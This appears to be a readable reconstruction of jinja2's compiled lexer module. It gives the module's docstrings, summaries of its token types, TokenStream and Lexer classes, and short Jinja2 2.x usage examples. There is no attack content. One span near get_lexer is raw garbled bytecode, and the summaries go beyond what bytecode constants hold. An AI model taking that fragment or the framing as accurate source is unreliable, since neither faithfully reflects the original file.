Current File : /lib/python3.6/site-packages/jinja2/__pycache__/lexer.cpython-36.pyc

The file is CPython 3.6 compiled bytecode (a marshalled code object) for the
jinja2.lexer module, not readable source. What follows is the information
recoverable from the string constants embedded in the bytecode: the module
docstring, then the top-level names and docstrings, with the binary opcode
data omitted.

Module docstring:
    jinja2.lexer
    ~~~~~~~~~~~~

    This module implements a Jinja / Python combination lexer. The
    `Lexer` class provided by this module is used to do some preprocessing
    for Jinja.

    On the one hand it filters out invalid operators like the bitshift
    operators we don't allow in templates. On the other hand it separates
    template code and Python code in expressions.

    :copyright: (c) 2017 by the Jinja Team.
    :license: BSD, see LICENSE for more details.
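
The split between template data and expression tokens is easiest to see by
lexing a small template. A minimal sketch, assuming Jinja2 2.x, where
Environment.lex() drives this module's Lexer and yields plain
(lineno, token_type, value) tuples:

    from jinja2 import Environment

    env = Environment()
    source = "Hello {{ name }}!{% if admin %} (admin){% endif %}"

    # Literal text arrives as 'data' tokens; the contents of {{ ... }} and
    # {% ... %} arrive as fine-grained tokens (name, operator, whitespace...).
    for lineno, token_type, value in env.lex(source):
        print(lineno, token_type, repr(value))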
Top-level structure (docstrings are quoted from the bytecode's string
constants; behavior is summarized in comments):

    import re
    from collections import deque
    from operator import itemgetter

    from jinja2._compat import implements_iterator, intern, iteritems, text_type
    from jinja2.exceptions import TemplateSyntaxError
    from jinja2.utils import LRUCache

    # _lexer_cache: an LRUCache shared by all environments (see get_lexer).
    # Static regexes: whitespace_re (\s+), string_re, integer_re (\d+),
    # float_re ((?<!\.)\d+\.\d+), newline_re ((\r\n|\r|\n)).  name_re is
    # chosen by probing compile('föö', '<unknown>', 'eval'): when the
    # interpreter accepts Unicode identifiers, the jinja2._identifier
    # pattern is used and check_ident is set to True; otherwise the ASCII
    # fallback [a-zA-Z_][a-zA-Z0-9_]* is used with check_ident = False.

    # Interned token-type constants: TOKEN_ADD, TOKEN_ASSIGN, TOKEN_COLON,
    # TOKEN_COMMA, TOKEN_DIV, TOKEN_DOT, TOKEN_EQ, TOKEN_FLOORDIV, TOKEN_GT,
    # TOKEN_GTEQ, TOKEN_LBRACE, TOKEN_LBRACKET, TOKEN_LPAREN, TOKEN_LT,
    # TOKEN_LTEQ, TOKEN_MOD, TOKEN_MUL, TOKEN_NE, TOKEN_PIPE, TOKEN_POW,
    # TOKEN_RBRACE, TOKEN_RBRACKET, TOKEN_RPAREN, TOKEN_SEMICOLON, TOKEN_SUB,
    # TOKEN_TILDE, TOKEN_WHITESPACE, TOKEN_FLOAT, TOKEN_INTEGER, TOKEN_NAME,
    # TOKEN_STRING, TOKEN_OPERATOR, TOKEN_BLOCK_BEGIN, TOKEN_BLOCK_END,
    # TOKEN_VARIABLE_BEGIN, TOKEN_VARIABLE_END, TOKEN_RAW_BEGIN,
    # TOKEN_RAW_END, TOKEN_COMMENT_BEGIN, TOKEN_COMMENT_END, TOKEN_COMMENT,
    # TOKEN_LINESTATEMENT_BEGIN, TOKEN_LINESTATEMENT_END,
    # TOKEN_LINECOMMENT_BEGIN, TOKEN_LINECOMMENT_END, TOKEN_LINECOMMENT,
    # TOKEN_DATA, TOKEN_INITIAL, TOKEN_EOF.

    # operators: maps source text ('+', '-', '/', '//', '*', '%', '**', '~',
    # '[', ']', '(', ')', '{', '}', '==', '!=', '>', '>=', '<', '<=', '=',
    # '.', ':', '|', ',', ';') to those constants.  reverse_operators inverts
    # the mapping (with an assert that no operators were dropped), and
    # operator_re matches all of them, longest first.  ignored_tokens and
    # ignore_if_empty are frozensets consumed by Lexer.wrap/tokeniter.

    def _describe_token_type(token_type):
        # Maps a token type to a human-readable description, e.g.
        # comment_begin -> 'begin of comment', block_end -> 'end of
        # statement block', eof -> 'end of template'; operator types
        # resolve through reverse_operators.
        ...

    def describe_token(token):
        """Returns a description of the token."""
    def describe_token_expr(expr):
        """Like `describe_token` but for token expressions."""
        # An expression is either a bare token type ('name') or a
        # 'token_type:token_value' pair ('name:endfor'); for 'name:...'
        # the value itself is returned.

    def count_newlines(value):
        """Count the number of newline characters in the string.  This is
        useful for extensions that filter a stream.
        """
        # len(newline_re.findall(value))

    def compile_rules(environment):
        """Compiles all the rules from the environment into a list of rules."""
        # Collects the comment/block/variable start strings plus the optional
        # line-statement and line-comment prefixes, sorted longest first, so
        # the root lexer state can find the earliest opening delimiter.
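
A minimal check of how token expressions are described, assuming the 2.x
module layout (expected values taken from the recovered mapping above):

    from jinja2.lexer import describe_token_expr

    print(describe_token_expr('name:endfor'))  # -> endfor (the value part)
    print(describe_token_expr('block_end'))    # -> end of statement block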






    class Failure(object):
        """Class that raises a `TemplateSyntaxError` if called.
        Used by the `Lexer` to specify known errors.
        """
        # Stores a message and an error class; __call__(lineno, filename)
        # raises error_class(message, lineno, filename).

    class Token(tuple):
        """Token class."""
        # An immutable (lineno, type, value) triple; __slots__ = () and the
        # three fields are exposed as properties via itemgetter.  __str__
        # renders operator types through reverse_operators.

        def test(self, expr):
            """Test a token against a token expression.  This can either be a
            token type or ``'token_type:token_value'``.  This can only test
            against string values and types.
            """

        def test_any(self, *iterable):
            """Test against multiple token expressions."""

        # __repr__ returns 'Token(%r, %r, %r)' % (lineno, type, value)
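
A short sketch of the token-expression test (Token is internal but importable
as jinja2.lexer.Token in 2.x):

    from jinja2.lexer import Token

    tok = Token(1, 'name', 'if')         # (lineno, type, value)
    print(tok.test('name'))              # True  - bare token type
    print(tok.test('name:if'))           # True  - type:value expression
    print(tok.test('name:for'))          # False - value does not match
    print(tok.test_any('integer', 'name:if'))  # True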
    @implements_iterator
    class TokenStreamIterator(object):
        """The iterator for tokenstreams.  Iterate over the stream
        until the eof token is reached.
        """
        # __next__ returns stream.current and advances; once the current
        # token is TOKEN_EOF it closes the stream and raises StopIteration.
    @implements_iterator
    class TokenStream(object):
        """A token stream is an iterable that yields :class:`Token`\s.  The
        parser however does not iterate over it but calls :meth:`next` to go
        one token ahead.  The current active token is stored as
        :attr:`current`.
        """
        # Wraps the token generator with a pushback deque; `eos` is a
        # property answering "Are we at the end of the stream?".

        def push(self, token):
            """Push a token back to the stream."""

        def look(self):
            """Look at the next token."""

        def skip(self, n=1):
            """Go n tokens ahead."""

        def next_if(self, expr):
            """Perform the token test and return the token if it matched.
            Otherwise the return value is `None`.
            """

        def skip_if(self, expr):
            """Like :meth:`next_if` but only returns `True` or `False`."""

        def __next__(self):
            """Go one token ahead and return the old one.

            Use the built-in :func:`next` instead of calling this directly.
            """

        def close(self):
            """Close the stream."""

        def expect(self, expr):
            """Expect a given token type and return it.  This accepts the same
            argument as :meth:`jinja2.lexer.Token.test`.
            """
            # Raises TemplateSyntaxError 'expected token X, got Y', or
            # 'unexpected end of template, expected X' at TOKEN_EOF.
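
How a parser drives the stream, sketched with the internal
Environment._tokenize entry point (which returns a TokenStream in 2.x):

    from jinja2 import Environment

    env = Environment()
    stream = env._tokenize('{{ user.name }}', name=None, filename=None)

    stream.expect('variable_begin')    # raises TemplateSyntaxError if absent
    target = stream.expect('name')     # Token(1, 'name', 'user')
    if stream.skip_if('dot'):          # consume '.' when present
        attr = stream.expect('name')   # Token(1, 'name', 'name')
    stream.expect('variable_end')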
r�cCsZ|j|j|j|j|j|j|j|j|j|j	|j
|jf}tj
|�}|dkrVt|�}|t|<|S)z(Return a lexer which is probably cached.N)rk�block_end_stringrl�variable_end_stringrj�comment_end_stringrmro�trim_blocks�
lstrip_blocks�newline_sequence�keep_trailing_newline�_lexer_cacherY�Lexer)rqrKZlexerr?r?rC�	get_lexer�s"
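
Because the key covers only those settings, environments with identical
delimiter configuration share one Lexer instance. A sketch, assuming the 2.x
layout where get_lexer is importable from jinja2.lexer:

    from jinja2 import Environment
    from jinja2.lexer import get_lexer

    a = Environment()
    b = Environment()                         # same settings as `a`
    c = Environment(block_start_string='<%')  # different delimiters

    assert get_lexer(a) is get_lexer(b)       # served from _lexer_cache
    assert get_lexer(a) is not get_lexer(c)   # new cache entry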
    class Lexer(object):
        """Class that implements a lexer for a given environment. Automatically
        created by the environment class, usually you don't have to do that.

        Note that the lexer is not automatically bound to an environment.
        Multiple environments can share the same lexer.
        """

        # __init__ compiles the environment's delimiters into a table of
        # per-state regex rules: a 'root' state that scans template data for
        # the first block/variable/comment/raw/line-statement opener, plus
        # one state per construct (comment, block, variable, raw,
        # linestatement, linecomment).  Each rule pairs a pattern with the
        # token types above and a state transition ('#bygroup' resolves the
        # next state from the named group that matched, '#pop' leaves the
        # state); Failure entries produce 'Missing end of comment tag' and
        # 'Missing end of raw directive' errors for unterminated constructs.
        # trim_blocks and lstrip_blocks are folded directly into these
        # patterns as newline- and whitespace-stripping alternatives.
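
The compiled rules are what make custom delimiters work transparently: the
same machinery lexes a template under a reconfigured environment (a sketch):

    from jinja2 import Environment

    env = Environment(block_start_string='<%', block_end_string='%>')
    for lineno, token_type, value in env.lex('<% if x %>hi<% endif %>'):
        print(token_type, repr(value))   # block_begin '<%', name 'if', ...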




        def _normalize_newlines(self, value):
            """Called for strings and template data to normalize it to unicode."""
            # newline_re.sub(self.newline_sequence, value)

        def tokenize(self, source, name=None, filename=None, state=None):
            """Calls tokeniter and wraps the result in a token stream."""
            # return TokenStream(self.wrap(self.tokeniter(...)), name, filename)

        def wrap(self, stream, name=None, filename=None):
            """This is called with the stream as returned by `tokenize` and wraps
            every token in a :class:`Token` and converts the value.
            """
            # Drops ignored_tokens (whitespace, comments), renames
            # linestatement/raw begin and end tokens to block_begin/block_end,
            # normalizes newlines in data, decodes string literals (raising
            # TemplateSyntaxError on bad escapes), converts integer/float
            # values to Python numbers, validates identifiers when check_ident
            # is set ('Invalid character in identifier'), and maps operator
            # text through the operators table.

        def tokeniter(self, source, name, filename=None, state=None):
            """This method tokenizes the text and returns the tokens in a
            generator.  Use this method if you just want to tokenize a
            template.
            """
            # Splits the source into lines (honoring keep_trailing_newline),
            # then repeatedly matches the rules of the current state:
            # template text is emitted as 'data', '#bygroup' resolves the
            # next state from the named match group, '#pop' leaves a state,
            # and a balancing stack tracks (), [] and {} so that mismatched
            # brackets fail early.  Errors raise TemplateSyntaxError, e.g.
            # "unexpected '}'", "unexpected '%s', expected '%s'" or
            # "unexpected char %r at %d".
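
End-to-end, tokenize() is what the environment uses to feed the parser, and
the balancing stack in tokeniter() turns a stray bracket into a syntax error
before parsing even starts (a sketch):

    from jinja2 import Environment
    from jinja2.exceptions import TemplateSyntaxError
    from jinja2.lexer import get_lexer

    env = Environment()
    stream = get_lexer(env).tokenize('{{ 42 }}')
    print(stream.current)   # Token(1, 'variable_begin', '{{')
    print(stream.look())    # Token(1, 'integer', 42) - wrap() converted it

    try:
        list(env.lex('{{ (a + b] }}'))
    except TemplateSyntaxError as e:
        print(e)             # unexpected ']', expected ')'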

(The remainder of the file is the marshalled name table and bytecode for the
definitions above; no further docstrings or constants are recoverable.)